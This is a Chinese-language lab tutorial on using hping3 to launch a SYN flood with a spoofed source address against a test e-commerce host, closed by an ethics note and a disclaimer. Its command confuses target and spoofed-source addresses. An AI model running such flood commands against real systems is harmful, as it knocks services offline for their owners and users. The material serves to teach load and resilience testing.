開源資安工具 – 吃我流量吧! – hping3

利用大量封包,藉以消耗受害者的網路頻寬與系統資源,導致網路癱瘓,無法提供正常的服務。

任務目標

根據《線上零售效能現狀報告》指出,網站載入時間延遲100毫秒,就會損及7%轉換率,您的目標是針對甲方的電商網站進行一定流量攻擊,以提出強化該網站效能的方案。

使用工具

hping3
作者:antirez
載點:https://github.com/antirez/hpinghttp://www.hping.org/
簡介:hping3 作為網路工具,可自定義TCP/IP封包並顯示回應,用於網路、連接埠、協定、作業系統、服務類型掃描。

攻擊環境

OS:Kali 2021.04
滲透目標:Win10

進行演練

Step 1. 下載 hping3,結果kali自帶了。

apt-get install hping3

Step 2. 查看 hping3 參數設定,說明如下:

  • -c:發送封包的個數
  • -d:每個封包的大小
  • -S:發送SYN封包
  • -w:TCP window大小
  • -p:目標埠,你可以指定任意埠
  • –flood:儘可能快的發送封包
  • –rand-source:隱藏來源位置(隨機產生)
man hping3

Step 3. 使用hping3 工具進行 DoS 攻擊,其中目標網址為 http://192.168.100.112/shop.html 。

sudo hping3 -S 192.168.238.128 -a 192.168.100.112 -p 80 --flood
  • SYN flooding:SYN洪水,一種阻斷服務攻擊
  • Ping of Death:死亡之Ping,惡意的ping指令

Step 4. 觀察目標網站的封包變化,其中圖表顯示目標接收到大量的封包。

電商網站突然收到大量封包
CPU效能大量消耗

討論

儘管hping3的初衷是作為安全工具,卻有可能被有心人士用於非法行為,期望使用這套工具的白帽駭客們,在強化與審核自家系統能否承受外來攻擊之時,也不忘初心,守護永恆的系統。

免責聲明

未經事先雙方同意,使用 hping3 攻擊目標是非法的。請遵守當地法律規範。開發者與本作者對此工具不承擔任何責任,也不對任何濫用或損壞負責。

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。

4 × 4 =

Back To Top
error: Content is protected !!